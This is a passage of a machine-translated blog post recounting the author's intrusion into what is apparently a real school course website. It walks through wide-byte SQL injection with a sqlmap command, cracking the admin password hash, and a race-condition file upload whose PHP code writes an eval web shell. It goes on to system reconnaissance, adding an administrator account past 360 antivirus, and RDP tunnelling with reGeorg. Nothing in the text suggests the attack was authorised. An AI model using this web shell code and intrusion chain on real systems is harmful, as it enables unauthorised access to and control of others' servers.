preface
The previous study of penetration has only been to learn Getshell, but in fact, penetration can say that Getshell is just the beginning, followed by remote connection, domain penetration and other fields, this time just infiltrated a website, decided to take this website as an example, to see if a relatively complete infiltration process
SQL injection
The website is a school a course site, first of all with a scanner scan the website, good luck, actually swept out an injection, a look, the original is a wide byte injection
Simple test, found that there is no filter, then normal operation, run with SQLmap
python2 sqlmap.py -u "http://xxx.xx.xx.xx/aaa/bbb.php? cid=118" --tamper=unmagicquotesCopy the codeThe next is the explosion, explosion table, explosion column, explosion value and other routine operations. Admin table in the account password, although the password is MD5 encryption, but to the CMD5 platform to check, or very convenient to enter the background
Getshell
Next comes the opportunity to get a Getshell
Notice that there is a place to upload the file, as you can see from the source code, the Fckeditor editor searches the web for relevant bugs, looking at the version first
Unfortunately, only the 2.6.6 ASP version hole could be found, and the PHP version did not find the relevant vulnerability. I tried my luck with several EXP, but all hit a wall. The penetration was blocked at this point, but suddenly I found that there was an interface to upload the student list
After testing, there was only a simple front-end certification, and using BurpSuite, there was a surprise
File upload is successful, not only and also returned to the corresponding path, the moment he thought of the shell, but when I’d like to have even, only to find that file is deleted, by a temp file path, suddenly thought of the backend must write an empty temp directory functions automatically, but the solution is also very clear, is the condition of competition, Through multi-threaded package sending method, to achieve a certain time of file access here I will send the file to change to:
<? php file_put_contents('.. /success.php',"<? php phpinfo(); @eval(\$_POST['a']); ? > "); ? >Copy the codeAs soon as we can access it once, the program will automatically write a shell to the parent directory, thus enabling a shell to be written out of the temp directory. Using the intruder module of BurpSuite to continuously send packets and then access the files we upload, we can successfully write the shell, as shown in the figure “Getshell” :
System Information Collection
systeminfoView system information
netstat -anoView open ports
You can see that port 3389 is open, which means you can make a remote connectionwhoamiViewing the current user
The remote connection
Can see is the system permission, originally I thought that finished, the next is to create the administrator user, when the remote connection, but found that in any case can not add the user into the administrator group to check a lot of information on the Internet, someone said that there may be anti-virus software. There are only three ways to solve the problem: 1. Kill 360 and see if you can kill 360 with the high permission of system 2. Obtain the password of another administrator or the hash value of the password and log in as another administrator 2. Create an administrator account bypassing 360
I tried all three:
- ZhuDongFangYu (ZhuDongFangYu. Exe) is in the Ring0 layer of the system. At least in this infiltration, I infiltrated the machine, there is no way to directly use taskkill to shut down the 360 process, including the Internet said
sc deleteIt won’t work on this machine either, at least for now it looks like the road is blocked - Method 2: When I upload Quarks Pwdump. exe and various software, it will be blocked by 360 without exception. It seems that this road is blocked too
- Method 3: Method 3 is our last hope, according to the data on the Internet, you can use the Windows API method to create an administrator account, and this method will not be blocked by 360, see this article for details: [[programming] Create a user and add it to the admin group] But the pain is that MY computer does not have VS, can not compile this file, and my friends do not have a person to install it (after all, he is too big) fortunately, I found a github version compiled by someone else github.com/cckuailong/… After running, the user was successfully added
When I tried to connect directly, I found that 3389 was not enabled. But 'netstat -ano' shows that 3389 is enabled, which means that port 3389 is enabled on the Intranet. We need to do Intranet penetration, forward the traffic out, use reGeorg for Intranet penetration.Copy the codeUpload tunnel.nosocket. PHP to the web directory to access the target file:
After the configuration is normal, we can successfully use the remote connection. After the remote connection, we should first exit all protection of 360 to prepare for further penetration
This penetration is here first, the following domain penetration, wait for later have time to study and study.
Write in the back
This is my first post Getshell penetration, and it may be verbose and LOW, but the main purpose is to keep in mind what I’ve learned about this penetration so THAT I can continue with the next domain penetration when I have time
[Infiltration book collection] 
Refer to the article
DNS hijacking reverseengineering IDA Intranet penetration